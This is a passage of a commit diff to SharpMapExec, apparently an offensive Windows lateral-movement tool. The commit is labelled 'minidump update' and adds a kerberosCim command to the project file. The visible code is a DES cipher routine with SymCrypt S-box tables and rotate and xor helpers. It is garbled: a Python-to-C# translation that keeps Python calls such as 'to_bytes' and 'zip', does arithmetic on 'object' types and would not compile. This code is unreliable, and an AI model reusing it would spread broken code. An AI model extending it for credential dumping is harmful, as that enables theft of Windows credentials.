190	+	L = L ^ Ta;
191	+	R = R ^ Ta;
192	+	L = rol32(L, 1);
193	+	//t = 'BEFORE F! L: %s R: %s' % (L,R)
194	+	//input(t)
195	+	if (encrypt) {
196	+	foreach (var i in Enumerable.Range(0, Convert.ToInt32(Math.Ceiling(Convert.ToDouble(14 - 0) / 2))).Select(_x_1 => 0 + _x_1 * 2)) {
197	+	var _tup_1 = F(L, R, des_key.desKey.roundKey[i]);
198	+	L = _tup_1.Item1;
199	+	R = _tup_1.Item2;
200	+	var _tup_2 = F(R, L, des_key.desKey.roundKey[i + 1]);
201	+	R = _tup_2.Item1;
202	+	L = _tup_2.Item2;
203	+	}
204	+	} else {
205	+	foreach (var i in Enumerable.Range(0, Convert.ToInt32(Math.Ceiling(Convert.ToDouble(-2 - 14) / -2))).Select(_x_2 => 14 + _x_2 * -2)) {
206	+	//print(i)
207	+	var _tup_3 = F(L, R, des_key.desKey.roundKey[i + 1]);
208	+	L = _tup_3.Item1;
209	+	R = _tup_3.Item2;
210	+	//t = 'F(%s) L: %s R: %s' % (i, L,R)
211	+	//input(t)
212	+	var _tup_4 = F(R, L, des_key.desKey.roundKey[i]);
213	+	R = _tup_4.Item1;
214	+	L = _tup_4.Item2;
215	+	//t = 'F(%s) L: %s R: %s' % (i, L,R)
216	+	//input(t)
217	+	//t = 'AFTER F! L: %s R: %s' % (L,R)
218	+	//input(t)
219	+	}
220	+	}
221	+	R = ror32(R, 1);
222	+	Ta = (L ^ R) & 0xaaaaaaaa;
223	+	L = L ^ Ta;
224	+	R = R ^ Ta;
225	+	L = ror32(L, 9);
226	+	Ta = (L ^ R) & 0x03fc03fc;
227	+	L ^= Ta;
228	+	R ^= Ta;
229	+	L = ror32(L, 22);
230	+	Ta = (L ^ R) & 0x33333333;
231	+	L ^= Ta;
232	+	R ^= Ta;
233	+	R = ror32(R, 14);
234	+	Ta = (L ^ R) & 0xfff0000f;
235	+	L ^= Ta;
236	+	R ^= Ta;
237	+	R = ror32(R, 20);
238	+	Ta = (L ^ R) & 0xf0f0f0f0;
239	+	L ^= Ta;
240	+	R ^= Ta;
241	+	L = ror32(L, 4);
242	+	return L.to_bytes(4, "little", signed: false) + R.to_bytes(4, "little", signed: false);
243	+	}
244	+	}
245	+
246	+	public static List<List<int>> SymCryptDesSpbox = new List<List<int>> {
247	+	new List<int> {
248	+	0x02080800,
249	+	0x00080000,
250	+	0x02000002,
251	+	0x02080802,
252	+	0x02000000,
253	+	0x00080802,
254	+	0x00080002,
255	+	0x02000002,
256	+	0x00080802,
257	+	0x02080800,
258	+	0x02080000,
259	+	0x00000802,
260	+	0x02000802,
261	+	0x02000000,
262	+	0x00000000,
263	+	0x00080002,
264	+	0x00080000,
265	+	0x00000002,
266	+	0x02000800,
267	+	0x00080800,
268	+	0x02080802,
269	+	0x02080000,
270	+	0x00000802,
271	+	0x02000800,
272	+	0x00000002,
273	+	0x00000800,
274	+	0x00080800,
275	+	0x02080002,
276	+	0x00000800,
277	+	0x02000802,
278	+	0x02080002,
279	+	0x00000000,
280	+	0x00000000,
281	+	0x02080802,
282	+	0x02000800,
283	+	0x00080002,
284	+	0x02080800,
285	+	0x00080000,
286	+	0x00000802,
287	+	0x02000800,
288	+	0x02080002,
289	+	0x00000800,
290	+	0x00080800,
291	+	0x02000002,
292	+	0x00080802,
293	+	0x00000002,
294	+	0x02000002,
295	+	0x02080000,
296	+	0x02080802,
297	+	0x00080800,
298	+	0x02080000,
299	+	0x02000802,
300	+	0x02000000,
301	+	0x00000802,
302	+	0x00080002,
303	+	0x00000000,
304	+	0x00080000,
305	+	0x02000000,
306	+	0x02000802,
307	+	0x02080800,
308	+	0x00000002,
309	+	0x02080002,
310	+	0x00000800,
311	+	0x00080802
312	+	},
313	+	new List<int> {
314	+	0x40108010,
315	+	0x00000000,
316	+	0x00108000,
317	+	0x40100000,
318	+	0x40000010,
319	+	0x00008010,
320	+	0x40008000,
321	+	0x00108000,
322	+	0x00008000,
323	+	0x40100010,
324	+	0x00000010,
325	+	0x40008000,
326	+	0x00100010,
327	+	0x40108000,
328	+	0x40100000,
329	+	0x00000010,
330	+	0x00100000,
331	+	0x40008010,
332	+	0x40100010,
333	+	0x00008000,
334	+	0x00108010,
335	+	0x40000000,
336	+	0x00000000,
337	+	0x00100010,
338	+	0x40008010,
339	+	0x00108010,
340	+	0x40108000,
341	+	0x40000010,
342	+	0x40000000,
343	+	0x00100000,
344	+	0x00008010,
345	+	0x40108010,
346	+	0x00100010,
347	+	0x40108000,
348	+	0x40008000,
349	+	0x00108010,
350	+	0x40108010,
351	+	0x00100010,
352	+	0x40000010,
353	+	0x00000000,
354	+	0x40000000,
355	+	0x00008010,
356	+	0x00100000,
357	+	0x40100010,
358	+	0x00008000,
359	+	0x40000000,
360	+	0x00108010,
361	+	0x40008010,
362	+	0x40108000,
363	+	0x00008000,
364	+	0x00000000,
365	+	0x40000010,
366	+	0x00000010,
367	+	0x40108010,
368	+	0x00108000,
369	+	0x40100000,
370	+	0x40100010,
371	+	0x00100000,
372	+	0x00008010,
373	+	0x40008000,
374	+	0x40008010,
375	+	0x00000010,
376	+	0x40100000,
377	+	0x00108000
378	+	},
379	+	new List<int> {
380	+	0x04000001,
381	+	0x04040100,
382	+	0x00000100,
383	+	0x04000101,
384	+	0x00040001,
385	+	0x04000000,
386	+	0x04000101,
387	+	0x00040100,
388	+	0x04000100,
389	+	0x00040000,
390	+	0x04040000,
391	+	0x00000001,
392	+	0x04040101,
393	+	0x00000101,
394	+	0x00000001,
395	+	0x04040001,
396	+	0x00000000,
397	+	0x00040001,
398	+	0x04040100,
399	+	0x00000100,
400	+	0x00000101,
401	+	0x04040101,
402	+	0x00040000,
403	+	0x04000001,
404	+	0x04040001,
405	+	0x04000100,
406	+	0x00040101,
407	+	0x04040000,
408	+	0x00040100,
409	+	0x00000000,
410	+	0x04000000,
411	+	0x00040101,
412	+	0x04040100,
413	+	0x00000100,
414	+	0x00000001,
415	+	0x00040000,
416	+	0x00000101,
417	+	0x00040001,
418	+	0x04040000,
419	+	0x04000101,
420	+	0x00000000,
421	+	0x04040100,
422	+	0x00040100,
423	+	0x04040001,
424	+	0x00040001,
425	+	0x04000000,
426	+	0x04040101,
427	+	0x00000001,
428	+	0x00040101,
429	+	0x04000001,
430	+	0x04000000,
431	+	0x04040101,
432	+	0x00040000,
433	+	0x04000100,
434	+	0x04000101,
435	+	0x00040100,
436	+	0x04000100,
437	+	0x00000000,
438	+	0x04040001,
439	+	0x00000101,
440	+	0x04000001,
441	+	0x00040101,
442	+	0x00000100,
443	+	0x04040000
444	+	},
445	+	new List<int> {
446	+	0x00401008,
447	+	0x10001000,
448	+	0x00000008,
449	+	0x10401008,
450	+	0x00000000,
451	+	0x10400000,
452	+	0x10001008,
453	+	0x00400008,
454	+	0x10401000,
455	+	0x10000008,
456	+	0x10000000,
457	+	0x00001008,
458	+	0x10000008,
459	+	0x00401008,
460	+	0x00400000,
461	+	0x10000000,
462	+	0x10400008,
463	+	0x00401000,
464	+	0x00001000,
465	+	0x00000008,
466	+	0x00401000,
467	+	0x10001008,
468	+	0x10400000,
469	+	0x00001000,
470	+	0x00001008,
471	+	0x00000000,
472	+	0x00400008,
473	+	0x10401000,
474	+	0x10001000,
475	+	0x10400008,
476	+	0x10401008,
477	+	0x00400000,
478	+	0x10400008,
479	+	0x00001008,
480	+	0x00400000,
481	+	0x10000008,
482	+	0x00401000,
483	+	0x10001000,
484	+	0x00000008,
485	+	0x10400000,
486	+	0x10001008,
487	+	0x00000000,
488	+	0x00001000,
489	+	0x00400008,
490	+	0x00000000,
491	+	0x10400008,
492	+	0x10401000,
493	+	0x00001000,
494	+	0x10000000,
495	+	0x10401008,
496	+	0x00401008,
497	+	0x00400000,
498	+	0x10401008,
499	+	0x00000008,
500	+	0x10001000,
501	+	0x00401008,
502	+	0x00400008,
503	+	0x00401000,
504	+	0x10400000,
505	+	0x10001008,
506	+	0x00001008,
507	+	0x10000000,
508	+	0x10000008,
509	+	0x10401000
510	+	},
511	+	new List<int> {
512	+	0x08000000,
513	+	0x00010000,
514	+	0x00000400,
515	+	0x08010420,
516	+	0x08010020,
517	+	0x08000400,
518	+	0x00010420,
519	+	0x08010000,
520	+	0x00010000,
521	+	0x00000020,
522	+	0x08000020,
523	+	0x00010400,
524	+	0x08000420,
525	+	0x08010020,
526	+	0x08010400,
527	+	0x00000000,
528	+	0x00010400,
529	+	0x08000000,
530	+	0x00010020,
531	+	0x00000420,
532	+	0x08000400,
533	+	0x00010420,
534	+	0x00000000,
535	+	0x08000020,
536	+	0x00000020,
537	+	0x08000420,
538	+	0x08010420,
539	+	0x00010020,
540	+	0x08010000,
541	+	0x00000400,
542	+	0x00000420,
543	+	0x08010400,
544	+	0x08010400,
545	+	0x08000420,
546	+	0x00010020,
547	+	0x08010000,
548	+	0x00010000,
549	+	0x00000020,
550	+	0x08000020,
551	+	0x08000400,
552	+	0x08000000,
553	+	0x00010400,
554	+	0x08010420,
555	+	0x00000000,
556	+	0x00010420,
557	+	0x08000000,
558	+	0x00000400,
559	+	0x00010020,
560	+	0x08000420,
561	+	0x00000400,
562	+	0x00000000,
563	+	0x08010420,
564	+	0x08010020,
565	+	0x08010400,
566	+	0x00000420,
567	+	0x00010000,
568	+	0x00010400,
569	+	0x08010020,
570	+	0x08000400,
571	+	0x00000420,
572	+	0x00000020,
573	+	0x00010420,
574	+	0x08010000,
575	+	0x08000020
576	+	},
577	+	new List<int> {
578	+	0x80000040,
579	+	0x00200040,
580	+	0x00000000,
581	+	0x80202000,
582	+	0x00200040,
583	+	0x00002000,
584	+	0x80002040,
585	+	0x00200000,
586	+	0x00002040,
587	+	0x80202040,
588	+	0x00202000,
589	+	0x80000000,
590	+	0x80002000,
591	+	0x80000040,
592	+	0x80200000,
593	+	0x00202040,
594	+	0x00200000,
595	+	0x80002040,
596	+	0x80200040,
597	+	0x00000000,
598	+	0x00002000,
599	+	0x00000040,
600	+	0x80202000,
601	+	0x80200040,
602	+	0x80202040,
603	+	0x80200000,
604	+	0x80000000,
605	+	0x00002040,
606	+	0x00000040,
607	+	0x00202000,
608	+	0x00202040,
609	+	0x80002000,
610	+	0x00002040,
611	+	0x80000000,
612	+	0x80002000,
613	+	0x00202040,
614	+	0x80202000,
615	+	0x00200040,
616	+	0x00000000,
617	+	0x80002000,
618	+	0x80000000,
619	+	0x00002000,
620	+	0x80200040,
621	+	0x00200000,
622	+	0x00200040,
623	+	0x80202040,
624	+	0x00202000,
625	+	0x00000040,
626	+	0x80202040,
627	+	0x00202000,
628	+	0x00200000,
629	+	0x80002040,
630	+	0x80000040,
631	+	0x80200000,
632	+	0x00202040,
633	+	0x00000000,
634	+	0x00002000,
635	+	0x80000040,
636	+	0x80002040,
637	+	0x80202000,
638	+	0x80200000,
639	+	0x00002040,
640	+	0x00000040,
641	+	0x80200040
642	+	},
643	+	new List<int> {
644	+	0x00004000,
645	+	0x00000200,
646	+	0x01000200,
647	+	0x01000004,
648	+	0x01004204,
649	+	0x00004004,
650	+	0x00004200,
651	+	0x00000000,
652	+	0x01000000,
653	+	0x01000204,
654	+	0x00000204,
655	+	0x01004000,
656	+	0x00000004,
657	+	0x01004200,
658	+	0x01004000,
659	+	0x00000204,
660	+	0x01000204,
661	+	0x00004000,
662	+	0x00004004,
663	+	0x01004204,
664	+	0x00000000,
665	+	0x01000200,
666	+	0x01000004,
667	+	0x00004200,
668	+	0x01004004,
669	+	0x00004204,
670	+	0x01004200,
671	+	0x00000004,
672	+	0x00004204,
673	+	0x01004004,
674	+	0x00000200,
675	+	0x01000000,
676	+	0x00004204,
677	+	0x01004000,
678	+	0x01004004,
679	+	0x00000204,
680	+	0x00004000,
681	+	0x00000200,
682	+	0x01000000,
683	+	0x01004004,
684	+	0x01000204,
685	+	0x00004204,
686	+	0x00004200,
687	+	0x00000000,
688	+	0x00000200,
689	+	0x01000004,
690	+	0x00000004,
691	+	0x01000200,
692	+	0x00000000,
693	+	0x01000204,
694	+	0x01000200,
695	+	0x00004200,
696	+	0x00000204,
697	+	0x00004000,
698	+	0x01004204,
699	+	0x01000000,
700	+	0x01004200,
701	+	0x00000004,
702	+	0x00004004,
703	+	0x01004204,
704	+	0x01000004,
705	+	0x01004200,
706	+	0x01004000,
707	+	0x00004004
708	+	},
709	+	new List<int> {
710	+	0x20800080,
711	+	0x20820000,
712	+	0x00020080,
713	+	0x00000000,
714	+	0x20020000,
715	+	0x00800080,
716	+	0x20800000,
717	+	0x20820080,
718	+	0x00000080,
719	+	0x20000000,
720	+	0x00820000,
721	+	0x00020080,
722	+	0x00820080,
723	+	0x20020080,
724	+	0x20000080,
725	+	0x20800000,
726	+	0x00020000,
727	+	0x00820080,
728	+	0x00800080,
729	+	0x20020000,
730	+	0x20820080,
731	+	0x20000080,
732	+	0x00000000,
733	+	0x00820000,
734	+	0x20000000,
735	+	0x00800000,
736	+	0x20020080,
737	+	0x20800080,
738	+	0x00800000,
739	+	0x00020000,
740	+	0x20820000,
741	+	0x00000080,
742	+	0x00800000,
743	+	0x00020000,
744	+	0x20000080,
745	+	0x20820080,
746	+	0x00020080,
747	+	0x20000000,
748	+	0x00000000,
749	+	0x00820000,
750	+	0x20800080,
751	+	0x20020080,
752	+	0x20020000,
753	+	0x00800080,
754	+	0x20820000,
755	+	0x00000080,
756	+	0x00800080,
757	+	0x20020000,
758	+	0x20820080,
759	+	0x00800000,
760	+	0x20800000,
761	+	0x20000080,
762	+	0x00820000,
763	+	0x00020080,
764	+	0x20020080,
765	+	0x20800000,
766	+	0x00000080,
767	+	0x20820000,
768	+	0x00820080,
769	+	0x00000000,
770	+	0x20000000,
771	+	0x20800080,
772	+	0x00020000,
773	+	0x00820080
774	+	}
775	+	};
776	+
777	+	public static object F(object L, object R, object keya) {
778	+	var Ta = keya[0] ^ R;
779	+	var Tb = keya[1] ^ R;
780	+	Tb = ror32(Tb, 4);
781	+	L ^= SymCryptDesSpbox[0][(Ta & 0xfc) / 4];
782	+	L ^= SymCryptDesSpbox[1][(Tb & 0xfc) / 4];
783	+	L ^= SymCryptDesSpbox[2][(Ta >> 8 & 0xfc) / 4];
784	+	L ^= SymCryptDesSpbox[3][(Tb >> 8 & 0xfc) / 4];
785	+	L ^= SymCryptDesSpbox[4][(Ta >> 16 & 0xfc) / 4];
786	+	L ^= SymCryptDesSpbox[5][(Tb >> 16 & 0xfc) / 4];
787	+	L ^= SymCryptDesSpbox[6][(Ta >> 24 & 0xfc) / 4];
788	+	L ^= SymCryptDesSpbox[7][(Tb >> 24 & 0xfc) / 4];
789	+	return Tuple.Create(L, R);
790	+	}
791	+
792	+	public static object rol32(object n, object d) {
793	+	return (n << d \| n >> 32 - d) & 0xFFFFFFFF;
794	+	}
795	+
796	+	public static object ror32(object n, object d) {
797	+	return (n >> d \| n << 32 - d) & 0xFFFFFFFF;
798	+	}
799	+
800	+	public static object xor(object d1, object d2) {
801	+	return bytes(from _tup_1 in zip(d1, d2).Chop((a,b) => (a, b))
802	+	let a = _tup_1.Item1
803	+	let b = _tup_1.Item2
804	+	select a ^ b);
805	+	}
806	+	}
807	+

■ ■ ■ ■ ■ ■

SharpMapExec/SharpMapExec.csproj

		skipped 76 lines
77	77		<Compile Include="Commands\ICommand.cs" />
78	78		<Compile Include="Commands\kerberosSmb.cs" />
79	79		<Compile Include="Commands\KerberosSpray.cs" />
	80	+	<Compile Include="Commands\kerberosCim.cs" />
80	81		<Compile Include="Commands\kerberosWinrm.cs" />
81	82		<Compile Include="Commands\NtlmReg32.cs" />
82	83		<Compile Include="Commands\NtlmSmb.cs" />
		skipped 172 lines

SharpMapExec/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache

Binary file.

minidump update, smaller improvements